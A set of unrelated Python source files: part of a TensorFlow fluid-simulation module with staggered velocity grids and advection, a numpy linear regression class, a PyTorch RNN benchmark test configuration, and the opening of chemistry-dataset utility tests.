centered_y_transform = GridTransform(self.centered_shape, scale=[2./_ for _ in self.y_shape[::-1]], center=True)
centered_z_transform = GridTransform(self.centered_shape, scale=[2./_ for _ in self.z_shape[::-1]], center=True)
# only shape important here
staggered_x_transform = GridTransform(self.x_shape)#,translation=[0.5,0,0])
staggered_y_transform = GridTransform(self.y_shape)#,translation=[0,0.5,0])
staggered_z_transform = GridTransform(self.z_shape)#,translation=[0,0,0.5])
x = tf.squeeze(self.scale_renderer._sample_transform(x, [centered_x_transform], [staggered_x_transform]),1)
y = tf.squeeze(self.scale_renderer._sample_transform(y, [centered_y_transform], [staggered_y_transform]),1)
z = tf.squeeze(self.scale_renderer._sample_transform(z, [centered_z_transform], [staggered_z_transform]),1)
return x,y,z
def _staggeredTensor_to_components(self, tensor, reverse=False):
tensor_shape = GridShape.from_tensor(tensor)
# assert len(tensor_shape)==5
assert tensor_shape.c==3
assert tensor_shape.n==1
assert np.asarray(self.tensor_shape)+np.asarray([1,1,1])== tensor_shape.xyz.as_shape() #tensor_shape[-4:-1]
tensor = tensor_shape.normalize_tensor_shape(tensor)
components = tf.split(tensor, 3, axis=-1)
if reverse:
components = components[::-1]
x = components[0][:,:-1,:-1,:]
y = components[0][:,:-1,:,:-1]
z = components[0][:,:,:-1,:-1]
return x,y,z
def as_staggeredTensor(self, reverse=False):
z = (0,0)
p = (0,1)
components = [
tf.pad(self.x, [z,p,p,z,z]),
tf.pad(self.y, [z,p,z,p,z]),
tf.pad(self.z, [z,z,p,p,z]),
]
if reverse:
components = components[::-1]
return tf.concat(components, axis=-1)
def _sampled_to_shape(self, shape):
with self.scale_renderer.profiler.sample("velocity to shape"):
# uniform scaling, centered grids
#_sample_transform assumes the output grid to be in a centered [-1,1] cube, so scale input accordingly
# scale with output shape to get the right 0.5 offset
scale = [2./_ for _ in shape[::-1]]
staggered_x_transform = GridTransform(self.x_shape, scale=scale, center=True)
staggered_y_transform = GridTransform(self.y_shape, scale=scale, center=True)
staggered_z_transform = GridTransform(self.z_shape, scale=scale, center=True)
# only shape important here
sample_transform = GridTransform(shape)
#check if shape matches component shape to avoid sampling (e.g. for self warping)
vel_sampled = [
tf.squeeze(self.scale_renderer._sample_transform(self.x, [staggered_x_transform], [sample_transform]),1) \
if not shape==self.x_shape else tf.identity(self.x), #1DHW1
tf.squeeze(self.scale_renderer._sample_transform(self.y, [staggered_y_transform], [sample_transform]),1) \
if not shape==self.y_shape else tf.identity(self.y),
tf.squeeze(self.scale_renderer._sample_transform(self.z, [staggered_z_transform], [sample_transform]),1) \
if not shape==self.z_shape else tf.identity(self.z),
]
return vel_sampled
def centered(self, pad_lod=False, concat=True):#, shape=None):
shape = self.centered_shape
with self.warp_renderer.profiler.sample("velocity to centered"):
#vel_centered = self._sampled_to_shape(shape)#3 x 1DHW1
h = tf.constant(0.5, dtype=tf.float32)
vel_centered = [
(self.x[:,:,:,1:] + self.x[:,:,:,:-1])*h,
(self.y[:,:,1:] + self.y[:,:,:-1])*h,
(self.z[:,1:] + self.z[:,:-1])*h,
]
if pad_lod:
vel_centered.append(self.lod_pad)#4 x 1DHW1
if concat:
vel_centered = tf.concat(vel_centered, axis=-1) #1DHW[3|4]
return vel_centered
def _sampled_to_component_shape(self, component, pad_lod=False, concat=True):
# grids have the same spacing/resolution, so global/constant offset
component = component.upper()
offset_coord_from = 0.5
offset_coord_to = -0.5
with self.warp_renderer.profiler.sample("velocity to component shape"):
vel_sampled = []
# sample x
vel_sampled.append(tf.identity(self.x) if component=='X' else \
tf.squeeze(self.warp_renderer.resample_grid3D_offset(self.x, \
offsets = [[offset_coord_from,offset_coord_to,0.0] if component=='Y' else [offset_coord_from,0.0,offset_coord_to],], \
target_shape = self.y_shape if component=='Y' else self.z_shape), 1))
# sample y
vel_sampled.append(tf.identity(self.y) if component=='Y' else \
tf.squeeze(self.warp_renderer.resample_grid3D_offset(self.y, \
offsets = [[offset_coord_to,offset_coord_from,0.0] if component=='X' else [0.0,offset_coord_from,offset_coord_to],], \
target_shape = self.x_shape if component=='X' else self.z_shape), 1))
# sample z
vel_sampled.append(tf.identity(self.z) if component=='Z' else \
tf.squeeze(self.warp_renderer.resample_grid3D_offset(self.z, \
offsets = [[offset_coord_to,0.0,offset_coord_from] if component=='X' else [0.0,offset_coord_to,offset_coord_from],], \
target_shape = self.x_shape if component=='X' else self.y_shape), 1))
if pad_lod:
vel_sampled.append(self.lod_pad)#4 x 1DHW1
if concat:
vel_sampled = tf.concat(vel_sampled, axis=-1) #1DHW[3|4]
return vel_sampled
def centered_lut_grid(self, dt=1.0):
vel_centered = self.centered()
#vel_lut = tf.concat([self.coords - vel_centered * dt, self.lod_pad], axis = -1)
vel_lut = vel_centered * (- dt)
return vel_lut
def warp(self, data, order=1, dt=1.0, clamp="NONE"):
with self.warp_renderer.profiler.sample("warp scalar"):
v = self.centered_lut_grid(dt)
data_shape = spacial_shape_list(data)
if data_shape!=self.centered_shape:
raise ValueError("Shape mismatch")
LOG.debug("Warping density grid")
data_warped = self.warp_renderer._sample_LuT(data, v, True, relative=True)
clamp = clamp.upper()
if order==2: #MacCormack
data_warped_back = self.warp_renderer._sample_LuT(data_warped, -v, True, relative=True)
data_corr = data_warped + 0.5*(data-data_warped_back)
if clamp=='MC' or clamp=='MC_SMOOTH': #smooth clamp
fm = self.warp_renderer.filter_mode
self.warp_renderer.filter_mode = "MIN"
data_min = self.warp_renderer._sample_LuT(data, v, True, relative=True)
self.warp_renderer.filter_mode = "MAX"
data_max = self.warp_renderer._sample_LuT(data, v, True, relative=True)
self.warp_renderer.filter_mode = fm
if clamp=='MC':
#LOG.warning("Experimental clamp for MacCormack density advection.")
raise NotImplementedError("MIM and MAX warp sampling have wrong gradients.")
data_corr = tf.clip_by_value(data_corr, data_min, data_max)
if clamp=='MC_SMOOTH':
#LOG.warning("Experimental 'revert' clamp for MacCormack density advection.")
clamp_OOB = tf.logical_or(tf.less(data_corr, data_min), tf.greater(data_corr, data_max))
data_corr = tf.where(clamp_OOB, data_warped, data_corr)
data_warped = data_corr
elif order>2:
raise ValueError("Unsupported warp order '{}'".format(order))
if clamp=='NEGATIVE':
data_warped = tf.maximum(data_warped, 0)
return data_warped
def with_buoyancy(self, value, scale_grid):
# value: [x,y,z]
# scale_grid: density 1DHW1
if isinstance(scale_grid, DensityGrid):
scale_grid = scale_grid.with_inflow() #.d
assert len(shape_list(value))==1
if not isinstance(value, (tf.Tensor, tf.Variable)):
value = tf.constant(value, dtype=tf.float32)
value = tf.reshape(value, [1,1,1,1,shape_list(value)[0]])
buoyancy = value*scale_grid # 1DHW3
return self + buoyancy
"""
def apply_buoyancy(self, value, scale_grid):
# value: [x,y,z]
# scale_grid: density 1DHW1
assert len(shape_list(value))==1
value = tf.reshape(tf.constant(value, dtype=tf.float32), [1,1,1,1,shape_list(value)[0]])
buoyancy = value*scale_grid # 1DHW3
self += buoyancy
"""
#centered
def divergence(self, world_scale=[1,1,1]):
#out - in per cell, per axis
x_div = self.x[:,:,:,1:,:] - self.x[:,:,:,:-1,:]
y_div = self.y[:,:,1:,:,:] - self.y[:,:,:-1,:,:]
z_div = self.z[:,1:,:,:,:] - self.z[:,:-1,:,:,:]
# sum to get total divergence per cell
div = x_div*world_scale[0]+y_div*world_scale[1]+z_div*world_scale[2]
return div
#centered
def magnitude(self, world_scale=[1,1,1]):
with self.warp_renderer.profiler.sample("magnitude"):
v = self.centered(pad_lod=False)*tf.constant(world_scale, dtype=tf.float32)
return tf_norm2(v, axis=-1, keepdims=True)
def stats(self, world_scale=[1,1,1], mask=None, state=None, **warp_kwargs):
'''
mask: optional binary float mask, stats only consider cells>0.5
'''
x = self.x
if mask is not None:
mask_x = tf.greater(self.scale_renderer.resample_grid3D_aligned(mask, self.x_shape, align_x='stagger_output'), 0.5)
x = tf.boolean_mask(x, mask_x)
y = self.y
if mask is not None:
mask_y = tf.greater(self.scale_renderer.resample_grid3D_aligned(mask, self.y_shape, align_y='stagger_output'), 0.5)
y = tf.boolean_mask(y, mask_y)
z = self.z
if mask is not None:
mask_z = tf.greater(self.scale_renderer.resample_grid3D_aligned(mask, self.z_shape, align_z='stagger_output'), 0.5)
z = tf.boolean_mask(z, mask_z)
if mask is not None and mask.dtype!=tf.bool:
mask = tf.greater(mask, 0.5)
divergence = self.divergence(world_scale)
if mask is not None: divergence = tf.boolean_mask(divergence, mask)
magnitude = self.magnitude(world_scale)
if mask is not None: magnitude = tf.boolean_mask(magnitude, mask)
stats = {
'divergence': tf_tensor_stats(divergence, as_dict=True),
'magnitude': tf_tensor_stats(magnitude, as_dict=True),
'velocity_x': tf_tensor_stats(x, as_dict=True),
'velocity_y': tf_tensor_stats(y, as_dict=True),
'velocity_z': tf_tensor_stats(z, as_dict=True),
'shape':self.centered_shape, 'bounds':self.outer_bounds,
}
if state is not None and state.prev is not None and state.prev.velocity is not None:
prev_warped = state.prev.velocity_advected(**warp_kwargs)
def vel_warp_SE_stats(prev, curr, mask):
warp_SE = tf.squared_difference(prev, curr)
if mask is not None:
warp_SE = tf.boolean_mask(warp_SE, mask)
return tf_tensor_stats(warp_SE, as_dict=True)
stats["warp_x_SE"] = vel_warp_SE_stats(prev_warped.x, self.x, mask_x if mask is not None else None)
stats["warp_y_SE"] = vel_warp_SE_stats(prev_warped.y, self.y, mask_y if mask is not None else None)
stats["warp_z_SE"] = vel_warp_SE_stats(prev_warped.z, self.z, mask_z if mask is not None else None)
warp_vdiff_mag = (prev_warped-self).magnitude()
if mask is not None:
warp_vdiff_mag = tf.boolean_mask(warp_vdiff_mag, mask)
stats["warp_vdiff_mag"] = tf_tensor_stats(warp_vdiff_mag, as_dict=True)
del warp_vdiff_mag
vel_CangleRad_mask = tf.greater(state.prev.velocity.magnitude() * self.magnitude(), 1e-8)
if mask is not None:
vel_CangleRad_mask = tf.logical_and(mask, vel_CangleRad_mask)
warp_CangleRad = tf_angle_between(state.prev.velocity.centered(), self.centered(), axis=-1, keepdims=True)
stats["warp_angleCM_rad"] = tf_tensor_stats(tf.boolean_mask(warp_CangleRad, vel_CangleRad_mask), as_dict=True)
del warp_CangleRad
else:
stats["warp_x_SE"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
stats["warp_y_SE"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
stats["warp_z_SE"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
stats["warp_vdiff_mag"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
stats["warp_angleCM_rad"] = tf_tensor_stats(tf.zeros([1,1,1,1,1], dtype=tf.float32), as_dict=True)
return stats
def __add__(self, other):
if isinstance(other, VelocityGrid):
if self.centered_shape!=other.centered_shape:
raise ValueError("VelocityGrids of shape %s and %s are not compatible"%(self.centered_shape, other.centered_shape))
return VelocityGrid(self.centered_shape, x=self.x+other.x, y=self.y+other.y, z=self.z+other.z, as_var=False, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=None)
if isinstance(other, (np.ndarray, tf.Tensor, tf.Variable)):
other_shape = shape_list(other)
if self.centered_shape!=spacial_shape_list(other) or other_shape[0]!=1 or other_shape[-1]!=3:
raise ValueError("VelocityGrid of shape %s is not compatible with tensor of shape %s are not compatible"%(self.centered_shape, spacial_shape_list(other)))
x,y,z = self._centered_to_staggered(other)
return VelocityGrid(self.centered_shape, x=self.x+x, y=self.y+y, z=self.z+z, as_var=False, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=None)
else:
return NotImplemented
def __iadd__(self, other):
if isinstance(other, VelocityGrid):
if self.centered_shape!=other.centered_shape:
raise ValueError("VelocityGrids of shape %s and %s are not compatible"%(self.centered_shape, other.centered_shape))
self.assign_add(other.x, other.y, other.z)
return self
if isinstance(other, (np.ndarray, tf.Tensor, tf.Variable)):
other_shape = shape_list(other)
if self.centered_shape!=spacial_shape_list(other) or other_shape[0]!=1 or other_shape[-1]!=3:
raise ValueError("VelocityGrid of shape %s is not compatible with tensor of shape %s are not compatible"%(self.centered_shape, spacial_shape_list(other)))
x,y,z = self._centered_to_staggered(other)
self.assign_add(x, y, z)
return self
else:
return NotImplemented
def __sub__(self, other):
if isinstance(other, VelocityGrid):
if self.centered_shape!=other.centered_shape:
raise ValueError("VelocityGrids of shape %s and %s are not compatible"%(self.centered_shape, other.centered_shape))
return VelocityGrid(self.centered_shape, x=self.x-other.x, y=self.y-other.y, z=self.z-other.z, as_var=False, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=None)
if isinstance(other, (np.ndarray, tf.Tensor, tf.Variable)):
other_shape = shape_list(other)
if self.centered_shape!=spacial_shape_list(other) or other_shape[0]!=1 or other_shape[-1]!=3:
raise ValueError("VelocityGrid of shape %s is not compatible with tensor of shape %s are not compatible"%(self.centered_shape, spacial_shape_list(other)))
x,y,z = self._centered_to_staggered(other)
return VelocityGrid(self.centered_shape, x=self.x-x, y=self.y-y, z=self.z-z, as_var=False, \
boundary=self.boundary, scale_renderer=self.scale_renderer, warp_renderer=self.warp_renderer, device=None)
else:
return NotImplemented
def __isub__(self, other):
if isinstance(other, VelocityGrid):
if self.centered_shape!=other.centered_shape:
raise ValueError("VelocityGrids of shape %s and %s are not compatible"%(self.centered_shape, other.centered_shape))
self.assign_sub(other.x, other.y, other.z)
return self
if isinstance(other, (np.ndarray, tf.Tensor, tf.Variable)):
other_shape = shape_list(other)
if self.centered_shape!=spacial_shape_list(other) or other_shape[0]!=1 or other_shape[-1]!=3:
raise ValueError("VelocityGrid of shape %s is not compatible with tensor of shape %s are not compatible"%(self.centered_shape, spacial_shape_list(other)))
x,y,z = self._centered_to_staggered(other)
self.assign_sub(x, y, z)
return self
else:
return NotImplemented
class State:
def __init__(self, density, velocity, frame, prev=None, next=None, transform=None, targets=None, targets_raw=None, bkgs=None):
self._density = None
if density is not None:
assert isinstance(density, DensityGrid)
self._density = density
self._velocity = None
if velocity is not None:
assert isinstance(velocity, VelocityGrid)
self._velocity = velocity
self.frame = frame
self.prev = prev
self.next = next
self.transform = transform
self.targets = targets
self.targets_raw = targets_raw
self.bkgs = bkgs
self.target_cameras = None
self.images = None
self.t = None
class StateIterator:
def __init__(self, state):
self.curr_state = state
def __next__(self):
if self.curr_state is not None:
state = self.curr_state
self.curr_state = state.next
return state
raise StopIteration
def __iter__(self):
return self.StateIterator(self)
@property
def density(self):
if self._density is not None:
return self._density
else:
raise AttributeError("State for frame {} does not contain density".format(self.frame))
@property
def velocity(self):
if self._velocity is not None:
return self._velocity
else:
raise AttributeError("State for frame {} does not contain velocity".format(self.frame))
@classmethod
def from_file(cls, path, frame, transform=None, as_var=True, boundary=None, scale_renderer=None, warp_renderer=None, device=None, density_filename="density.npz", velocity_filename="velocity.npz"):
density = DensityGrid.from_file(os.path.join(path, density_filename), as_var=as_var, scale_renderer=scale_renderer, device=device)
velocity = VelocityGrid.from_file(os.path.join(path, velocity_filename), as_var=as_var, \
boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device)
state = cls(density, velocity, frame, transform=transform)
return state
@classmethod
def from_scalarFlow_file(cls, density_path, velocity_path, frame, transform=None, as_var=True, boundary=None, scale_renderer=None, warp_renderer=None, device=None):
density = DensityGrid.from_scalarFlow_file(density_path, as_var=as_var, scale_renderer=scale_renderer, device=device)
velocity = VelocityGrid.from_scalarFlow_file(velocity_path, as_var=as_var, \
boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device)
state = cls(density, velocity, frame, transform=transform)
return state
def copy(self, as_var=None, device=None):
s = State(self.density.copy(as_var=as_var, device=device), self.velocity.copy(as_var=as_var, device=device), self.frame)
m = copy.copy(self.__dict__)
del m["_velocity"]
del m["_density"]
del m["prev"]
del m["next"]
for k,v in m.items():
setattr(s,k,v)
return s
def copy_warped(self, order=1, dt=1.0, frame=None, as_var=None, targets=None, targets_raw=None, bkgs=None, device=None, clamp="NONE"):
d = self.density.copy_warped(order=order, dt=dt, as_var=as_var, device=device, clamp=clamp)
v = self.velocity.copy_warped(order=order, dt=dt, as_var=as_var, device=device, clamp=clamp)
return State(d, v, frame, transform=self.transform, targets=targets, targets_raw=targets_raw, bkgs=bkgs)
def get_density_transform(self):
if isinstance(self.transform, GridTransform):
return self.transform.copy_new_data(self.density.d)
else:
raise TypeError("state.transform is not a GridTransform")
def get_velocity_transform(self):
if isinstance(self.transform, GridTransform):
return self.transform.copy_new_data(self.velocity.lod_pad)
else:
raise TypeError("state.transform is not a GridTransform")
def render_density(self, render_ctx, custom_ops=None):
imgs = tf.concat(render_ctx.dens_renderer.render_density(self.get_density_transform(), light_list=render_ctx.lights, camera_list=self.target_cameras, cut_alpha=False, monochrome=render_ctx.monochrome, custom_ops=custom_ops), axis=0) #, background=bkg
imgs, d = tf.split(imgs, [3,1], axis=-1)
t = tf.exp(-d)
self.images = imgs
self.t = t
def density_advected(self, dt=1.0, order=1, clamp="NONE"):
return self.density.warped(self.velocity, order=order, dt=dt, clamp=clamp)#self.velocity.warp(self.density, scale_renderer)
def velocity_advected(self, dt=1.0, order=1, clamp="NONE"):
return self.velocity.copy_warped(order=order, dt=dt, as_var=False, clamp=clamp)
def rescale_density(self, shape, device=None):
self._density = self.density.copy_scaled(shape, device=device)
def rescale_velocity(self, shape, scale_magnitude=True, device=None):
self._velocity = self.velocity.copy_scaled(shape, scale_magnitude=scale_magnitude, device=device)
def rescale(self, dens_shape, vel_shape, device=None):
rescale_density(self, dens_shape, device=device)
rescale_velocity(self, vel_shape, device=device)
def var_list(self):
var_list = []
if self._density is not None:
var_list += self.density.var_list()
if self._velocity is not None:
var_list += self.velocity.var_list()
return var_list
def get_variables(self):
var_dict = {}
if self._density is not None:
var_dict.update(self.density.get_variables())
if self._velocity is not None:
var_dict.update(self.velocity.get_variables())
return var_dict
def stats(self, vel_scale=[1,1,1], mask=None, render_ctx=None, **warp_kwargs):
target_stats = None
if render_ctx is not None and getattr(self, "target_cameras", None) is not None:
target_stats = {}
self.render_density(render_ctx)
if getattr(self, "targets_raw") is not None and getattr(self, "bkgs") is not None:
target_stats["SE_raw"] = tf_tensor_stats(tf.math.squared_difference(self.images + self.bkgs*self.t, self.targets_raw), as_dict=True)
if getattr(self, "targets") is not None:
target_stats["SE"] = tf_tensor_stats(tf.math.squared_difference(self.images, self.targets), as_dict=True)
return self.density.stats(mask=mask, state=self, **warp_kwargs), self.velocity.stats(vel_scale, mask=mask, state=self, **warp_kwargs), target_stats
def save(self, path, suffix=None):
self.density.save(os.path.join(path, 'density.npz' if suffix is None else 'density_'+suffix+'.npz'))
self.velocity.save(os.path.join(path, 'velocity.npz' if suffix is None else 'velocity_'+suffix+'.npz'))
class Sequence:
def __init__(self, states):
self.sequence = [state for state in states]
class SequenceIterator:
def __init__(self, sequence):
self.seq = sequence
self.idx = 0
def __next__(self):
if self.idx<len(self.seq):
idx = self.idx
self.idx +=1
return self.seq[idx]
raise StopIteration
def __iter__(self):
return self.SequenceIterator(self)
def __getitem__(self, idx):
return self.sequence[idx]
def __len__(self):
return len(self.sequence)
@classmethod
def from_file(cls, load_path, frames, transform=None, as_var=True, base_path=None, boundary=None, scale_renderer=None, warp_renderer=None, device=None, density_filename="density.npz", velocity_filename="velocity.npz", frame_callback=lambda idx, frame: None):
sequence = []
prev = None
for idx, frame in enumerate(frames):
frame_callback(idx, frame)
sub_dir = 'frame_{:06d}'.format(frame)
data_path = os.path.join(load_path, sub_dir)
state = State.from_file(data_path, frame, transform=transform, as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, \
device=device, density_filename=density_filename, velocity_filename=velocity_filename)
if base_path is not None:
state.data_path = os.path.join(base_path, sub_dir)
os.makedirs(state.data_path, exist_ok=True)
state.prev = prev
prev = state
sequence.append(state)
for i in range(len(sequence)-1):
sequence[i].next = sequence[i+1]
return cls(sequence)
@classmethod
def from_scalarFlow_file(cls, density_path_mask, velocity_path_mask, frames, transform=None, as_var=True, base_path=None, boundary=None, scale_renderer=None, warp_renderer=None, device=None, vel_frame_offset=1, frame_callback=lambda idx, frame: None):
sequence = []
prev = None
for idx, frame in enumerate(frames):
frame_callback(idx, frame)
sub_dir = 'frame_{:06d}'.format(frame)
density_path = density_path_mask.format(frame=frame)
velocity_path = velocity_path_mask.format(frame=frame+vel_frame_offset)
state = State.from_scalarFlow_file(density_path, velocity_path, frame=frame, transform=transform, as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device)
if base_path is not None:
state.data_path = os.path.join(base_path, sub_dir)
os.makedirs(state.data_path, exist_ok=True)
state.prev = prev
prev = state
sequence.append(state)
for i in range(len(sequence)-1):
sequence[i].next = sequence[i+1]
return cls(sequence)
def copy(self, as_var=None, device=None):
s = [_.copy(as_var=as_var, device=device) for _ in self]
for i in range(len(s)):
if i>0:
s[i].prev = s[i-1]
if i<(len(s)-1):
s[i].next = s[i+1]
return Sequence(s)
def insert_state(self, state, idx):
self.sequence.insert(state, idx)
def append_state(self, state):
self.sequence.append(state)
def start_iteration(self, iteration):
for state in self:
ctx.start_iteration(iteration)
def stats(self, vel_scale=[1,1,1], mask=None, **warp_kwargs):
return [_.stats(vel_scale, mask=mask, state=_, **warp_kwargs) for _ in self]
def save(self, path=None, suffix=None):
for state in self:
if path is None and hasattr(state, 'data_path'):
state.save(state.data_path, suffix)
else:
state.save(os.path.join(path, 'frame_{:06d}'.format(state.frame)), suffix)
def densities_advect_fwd(self, dt=1.0, order=1, clamp='NONE'):
if clamp is None or clamp.upper()not in ['LOCAL', 'GLOBAL']:
for i in range(1, len(self)):
self[i].density.assign(self[i-1].density_advected(order=order, dt=dt, clamp=clamp))
elif clamp.upper()=='LOCAL': #clamp after each step, before the next warp
for i in range(1, len(self)):
self[i].density.assign(tf.maximum(self[i-1].density_advected(order=order, dt=dt), 0))
elif clamp.upper()=='GLOBAL': #clamp after all warping
for i in range(1, len(self)):
self[i].density.assign(self[i-1].density_advected(order=order, dt=dt))
for i in range(1, len(self)):
self[i].density.assign(tf.maximum(self[i].density._d, 0))
def velocities_advect_fwd(self, dt=1.0, order=1, clamp='NONE'):
for i in range(1, len(self)):
self[i].velocity.assign(*self[i-1].velocity.warped(order=order, dt=dt, clamp=clamp))
|
144438
|
import numpy as np
from ._base import LinearModel
from ._regularization import REGULARIZE, Regularizer
from utils import batch
class LinearRegression(LinearModel):
"""Linear regression model."""
def __init__(self, regular: REGULARIZE = None):
super().__init__()
if REGULARIZE is not None:
self._regular = Regularizer(regular)
else:
self._regular = None
def fit(self, x: np.ndarray, y: np.ndarray, **kwargs) -> float:
assert x.shape[0] == y.shape[0]
n, p = x.shape
if self._w is None or self._b is None or self._w.shape[0] != p:
# Initialize weights using random values
self._init_model(p)
if kwargs is not None:
# Update parameters of training
self._update_params(kwargs)
iters, loss = 0, 0.
# Iterates till converge or iterating times exceed bound
while iters < self._iter_bound:
iters += 1
# Update weights using mini-batch gradient desent
for batch_x, batch_y in batch(x, y, self._batch_size):
pred_val = self._predict_value(batch_x, self._w, self._b)
loss += self._loss(pred_val, batch_y) * batch_x.shape[0]
grad_w, grad_b = self._grad(batch_x, pred_val, batch_y)
self._w -= grad_w
self._b -= grad_b
loss /= n
# Break if model converges.
if loss <= self._loss_tol:
break
# Update model with current weight and bias
self._update_model(loss)
return loss
def fit_norm_eq(self, x: np.ndarray, y: np.ndarray) -> float:
# Fit x using normal equation
assert x.shape[0] == y.shape[0]
n, p = x.shape
if self._w is None or self._b is None or self._w.shape[0] != p:
# Initialize weights using random values
self._init_model(p)
x_ext = np.hstack((np.ones((n, 1)), x))
w_ext = np.linalg.pinv(np.matmul(x_ext.T, x_ext))
w_ext = np.matmul(np.matmul(w_ext, x_ext.T), y)
self._w, self._b = w_ext[1:], w_ext[0]
# Calculate training loss
pred_val = self._predict_value(x, self._w, self._b)
loss = self._loss(pred_val, y)
self._update_model(loss)
return loss
def predict(self, x: np.ndarray, **kwargs) -> np.ndarray:
assert not np.isinf(self._optimum['loss'])
assert self._optimum['w'].shape[0] == x.shape[1]
pred_val = self._predict_value(x, self._optimum['w'],
self._optimum['b'])
return pred_val
def evaluate(self, x: np.ndarray, y: np.ndarray, **kwargs) -> tuple:
assert x.shape[0] == y.shape[0]
assert not np.isinf(self._optimum['loss'])
assert self._optimum['w'].shape[0] == x.shape[1]
pred_val = self._predict_value(x, self._optimum['w'],
self._optimum['b'])
# The precision part of regression is None
precision = None
loss = self._loss(pred_val, y)
return precision, loss
@staticmethod
def _predict_value(x: np.ndarray, w: np.ndarray,
b: float) -> np.ndarray:
pred_val = np.matmul(x, w) + b
return pred_val
@staticmethod
def _predict_label(pred_val: np.ndarray) -> np.ndarray:
# NO labeling in regression.
pass
def _loss(self, pred_val: np.ndarray, true_val: np.ndarray) -> float:
# Use MSE loss
loss = float(np.sum(np.power(pred_val - true_val, 2)))
loss /= 2 * true_val.shape[0]
# Add regularized loss
if self._regular is not None:
loss += self._regular[self._w]
return loss
def _grad(self, x: np.ndarray, pred_val: np.ndarray,
true_val: np.ndarray) -> tuple:
# Use MSE loss
grad_w = (x * (pred_val - true_val).reshape((-1, 1))).mean(axis=0)
grad_b = (pred_val - true_val).mean()
# Use simple gradient by multiplying learning rate and grad.
grad_w *= self._learn_rate
grad_b *= self._learn_rate
# Add regularized grad
if self._regular is not None:
grad_w += self._regular.grad(self._w)
return grad_w, grad_b
|
144440
|
from __future__ import print_function
import pytest
import torch
from .runner import get_nn_runners
default_rnns = ['cudnn', 'aten', 'jit', 'jit_premul', 'jit_premul_bias', 'jit_simple',
'jit_multilayer', 'py']
default_cnns = ['resnet18', 'resnet18_jit', 'resnet50', 'resnet50_jit']
all_nets = default_rnns + default_cnns
def pytest_generate_tests(metafunc):
# This creates lists of tests to generate, can be customized
if metafunc.cls.__name__ == "TestBenchNetwork":
metafunc.parametrize('net_name', all_nets, scope="class")
metafunc.parametrize("executor_and_fuser", ["legacy-old"], scope="class")
def set_fuser(fuser_name):
if fuser_name == 'te':
torch._C._jit_override_can_fuse_on_cpu(False)
torch._C._jit_override_can_fuse_on_gpu(False)
torch._C._jit_set_texpr_fuser_enabled(True)
elif fuser_name == 'old':
torch._C._jit_override_can_fuse_on_gpu(True)
torch._C._jit_set_texpr_fuser_enabled(False)
elif fuser_name == 'none':
torch._C._jit_override_can_fuse_on_gpu(False)
torch._C._jit_override_can_fuse_on_cpu(False)
torch._C._jit_set_texpr_fuser_enabled(False)
def set_executor(executor_name):
if executor_name == 'profiling':
torch._C._jit_set_profiling_executor(True)
torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_bailout_depth(20)
elif executor_name == 'simple':
torch._C._jit_set_profiling_executor(True)
torch._C._jit_set_profiling_mode(False)
elif executor_name == 'legacy':
torch._C._jit_set_profiling_executor(False)
torch._C._jit_set_profiling_mode(False)
@pytest.fixture(scope='class')
def modeldef(request, net_name, executor_and_fuser):
executor, fuser = executor_and_fuser.split("-")
set_executor(executor)
set_fuser(fuser)
# Given a 'net_name' provided by generate_tests, build the thing
name, rnn_creator, context = get_nn_runners(net_name)[0]
creator_args = creator_args = {
'seqLength': 100, 'numLayers': 1,
'inputSize': 512, 'hiddenSize': 512,
'miniBatch': 64, 'device': 'cuda', 'seed': None
}
return rnn_creator(**creator_args)
def cuda_sync(func, *args, **kwargs):
out = func(*args, **kwargs)
torch.cuda.synchronize()
return out
@pytest.mark.benchmark(
warmup=True,
warmup_iterations=3,
disable_gc=True,
max_time=0.1,
group="fastrnns",
)
class TestBenchNetwork:
# See 'modeldef' fixture, which provides the things to benchmark
def test_forward(self, modeldef, benchmark):
forward_output = benchmark(cuda_sync, modeldef.forward, *modeldef.inputs)
def test_backward(self, modeldef, benchmark):
backward_input = modeldef.forward(*modeldef.inputs)
if modeldef.backward_setup is not None:
backward_input = modeldef.backward_setup(backward_input)
if modeldef.backward is not None:
benchmark(cuda_sync, modeldef.backward, *backward_input, retain_graph=True)
for param in modeldef.params:
assert param.grad is not None
param.grad.data.zero_()
|
144484
|
import numpy as np
import pytest
from chainer_chemistry.dataset.preprocessors import wle_util
def test_to_index():
values = ['foo', 'bar', 'buz', 'non-exist']
mols = [['foo', 'bar', 'buz'], ['foo', 'foo'], ['buz', 'bar']]
actual = wle_util.to_index(mols, values)
expect = np.array([np.array([0, 1, 2], np.int32),
np.array([0, 0], np.int32),
np.array([2, 1], np.int32)])
assert len(actual) == len(expect)
for a, e in zip(actual, expect):
np.testing.assert_array_equal(a, e)
def test_to_index_non_existence():
values = ['foo', 'bar']
mols = [['strange_label']]
with pytest.raises(ValueError):
wle_util.to_index(mols, values)
def test_compress_relation_axis_2_dim():
arr = np.random.uniform(size=(10, 2))
actual = wle_util.compress_relation_axis(arr)
np.testing.assert_array_equal(actual, arr)
def test_compress_relation_axis_3_dim():
arr = np.array(
[
[
[1, 0],
[2, 0],
],
[
[1, 1],
[0, 0]
]
]
)
arr = np.swapaxes(arr, 0, 1)
ret = wle_util.compress_relation_axis(arr)
actual = ret != 0
expect = np.array(
[[True, True],
[True, False]]
)
np.testing.assert_array_equal(actual, expect)
def test_compress_relation_axis_invalid_ndim():
arr = np.zeros(3)
with pytest.raises(ValueError):
wle_util.compress_relation_axis(arr)
arr = np.zeros((1, 2, 3, 4))
with pytest.raises(ValueError):
wle_util.compress_relation_axis(arr)
@pytest.fixture
def small_molecule():
# a-b-c d
atom_array = ['a', 'b', 'c', 'd']
neighbors = np.array(
[
[0, 1, 1, 2], # first end of edges
[1, 0, 2, 1] # second end of edges
]
)
